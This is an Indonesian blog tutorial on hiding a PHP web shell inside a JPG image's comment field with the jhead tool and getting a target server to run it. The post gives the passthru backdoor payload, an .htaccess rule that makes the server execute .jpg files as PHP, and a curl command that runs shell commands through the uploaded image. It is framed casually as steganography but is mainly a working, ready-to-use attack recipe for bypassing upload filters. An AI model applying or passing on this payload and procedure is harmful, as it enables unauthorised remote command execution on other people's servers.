Selasa, 24 Maret 2020

Cara Menyisipkan Script PHP ke Gambar JPG dengan Jhead

Cara Menyisipkan Script PHP ke Gambar JPG dengan Jhead, Ada banyak cara untuk upload shell backdoor ke server salah satunya yaitu dengan menggunakan Gambar JPG yang sudah disisipkan Script PHP. Teknik tersebut juga dinamakan dengan Steganografi dimana pengertian dari steganografi adalah seni dan ilmu menulis pesan tersembunyi dengan kata lain teknik menyembunyikan pesan dengan suatu cara salah satunya menggunakan tool Jhead.

Jadi, selain pihak pengirim dan penerima pesan, tidak ada yang tahu dan menyadari bahwa ada suatu pesan rahasia dalam Gambar JPG. sobat saya kemarin explore sendiri dan menemukan bahwa steganografi juga bisa menggunakan tool Jhead ,dan bisa juga disisipi script php ke dalam gambar loh. selain tool jhead, ada lagi tool yaitu exiftool, gwe makai tool jhead sesuai mood gwe, kalau sobat gimana nih? apakah sama dengan gwe, jika iya komen ya sob.

 Cara Install Tool Jhead dan Exiftool

Jhead
sudo apt-get install jhead
Open terminal atau bisa menekan CTRL + ALT + T dan ketikkan perintah diatas, tunggu sampai selesai.

Gambar 
Sobat bisa menggunkan gambar dengan format jpg, dan gwe taruh di direktori /root/boruto.jpg

Selanjutnya buka Direktori penyimpanan gambar dan klik kanan -> open terminal.

JIka sudah ditampilan terminal, sobat ketikkan perintah untuk memurnikan filenya, dimana dapat diartikan untuk menghapus comment atau script yang sudah disisipkan sebelumnya.
jhead -purejpg nama_file.jpg


selanjutnya ketikkan perintah
Jhead
jhead -cs nama_file.jpg




Berikutnya jendela editor vim akan muncul dan kalian tinggal masukin comment dengan script php seperti dibawah
<?php passthru($_POST['cmd']); __halt_compiler();

Dan kalian save, caranya sobat tekan tombol escape atau esc dan ketikkan  :wq


JIka berhasil maka outpunya akan seperti gambar diatas, Selanjutnya sobat tinggal upload di uploader, agar bisa masuk ke server sobat harus upload file .httaccess dan masukkan script dibawah pada file .httacces
Addtype application/x-https-php .jpg

Berfungsi untuk dapat membaca script php didalamnya walaupun filenya bukan php

Dan akses shell bacdoor kalian yang sudah terupload di server dengan perintah

curl -d cmd="uname -a; anjay; id" http://domain.com/boruto.jpg

Gimana sob? Mudah kan sekian tutorial Cara Menyisipkan Script PHP ke Gambar JPG dengan Jhead, semoga tutorial tersebut bermanfaat.
Previous Post
Next Post

post written by:

0 komentar: